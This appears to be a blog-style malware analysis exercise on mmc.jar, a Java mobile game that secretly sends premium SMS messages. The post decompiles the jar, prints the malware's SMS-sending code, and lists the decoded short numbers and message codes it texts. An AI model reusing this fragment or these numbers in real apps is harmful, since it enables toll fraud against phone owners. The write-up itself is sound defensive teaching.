PURPOSE
The goal of this post is to identify and analyze mobile malware file: mmc.jar. Thereby please follow the following steps for completing the task:
- Unpack the file (hint – using zip on .jar)
- Examine .class files using tool available here (local copies for Mac, Linux, Win)
- Find code sending SMSes using ‘sms://’ URI
- Calculate short number used in SM.send
- Finally for compiling the code use the developing tool Eclipse IDE.
ANALYSIS
After running the decompiler tool we are examining and analyzing the Java source code. Whereby on the source code on the class M.class line 343 we have found the following source code:
if ((i >= 35) &amp;&amp; (SM.isSending != true) &amp;&amp; (i % 6 == 0) &amp;&amp; (f < count_query)) {
if (SM.GS()) f += 1;
if (f == 1) {
RS.L(rs);
RS.L("Slide");
rs = RS.j("Slide");
game = RS.L(rs, Integer.toString((int)(System.currentTimeMillis() / 1000L)));
RS.L(rs);
}if (f < count_query) {
game = SM.send("sms://" + ms[1][b], ms[2][b]); // sms://
if (b == count_query) b = 1; else b += 1;
}
public static int send(String s, String s1)
{
if (isSending) return 0;
new SM(s, s1);
return -1;
}
public SM(String s, String s1) {
success = false;
isSending = true;
this.destination = s;
this.message = s1;
try {
Thread thread = new Thread(this);
thread.start();
}
catch (Exception exception) {
isSending = false;
}
The above code is checking if the message and the destination is correct
and if the message is sent. Coloration is more like the first public static method named send with the two string values of s and s1.
All the above extraction was finished by JD-Gui version 0.3.3 and JD-Core version 0.6.0 and using the menu bar for search, with the criteria that will meet our needs.
The bellow are executable results presented, done by eclipse after compiling the code:
/0SIF|6XI8ULE|YNLD5QDA6WM|YJ90RL/+WPJDAFY2 DC3QJ/+3RKA/5YPA0MD-5QFD while 7375/88600168904|7202/65510006691|1899/FTEME 1283|8385/88600168904| 1 16 2 33 3 49 4 66 7375 88600168904 //sms://7375 7202 65510006691 //sms://7202 1899 fteme 1283 //sms://1899 8385 88600168904 //sms://8385 decoded 36 7375 88600168904 42 7202 65510006691 48 1899 fteme 1283 54
From the above presented results after compiling the code we have identify the number of SMSes URLs and in addition the exact URLs.
CONCLUSION
We live in a world were nowadays for everyday work, communication, etc. the most essentially tool is our mobile phones, smart phones, etc. We used them for communication, sending SMS, playing games, checking e-mails, social networking, bank transaction, etc. That is why today there are hundreds and rising everyday mobile malware files. We need to make sure what we are installing in our devices, what kind of games, applications, etc. Therefore, this post will help for a people who are interested to learn basic of how to analysis and identify malware files for mobile phones. However, this is only a basic, and a good guide to give you an idea of what kind of tools, applications you should have. This task is done only for a Java source code mobile malware game.
Furthermore, from the above section we have identify the number of SMSes that are sent and to what numbers. The total number of SMSes is 4 and sent to the following URLs:
sms://7375
sms://7202
sms://1899
sms://8385
Finally, mobile malware is rising and it is about to explode, therefore users need education[1]. By delivering basic and advance mobile malware security awareness program we will have less malware attacks and better security policy into everyday mobile, smart phones usage.
Bibliography
[1] Chris Martin, Mobile malware is about to explode, users need education, 20 Jan. 2012, http://www.theinquirer.net/inquirer/opinion/2140338/mobile-malware-explode-users-education
Facebook
LinkedIn
Twitter
GooglePlus
Last
FourSquare
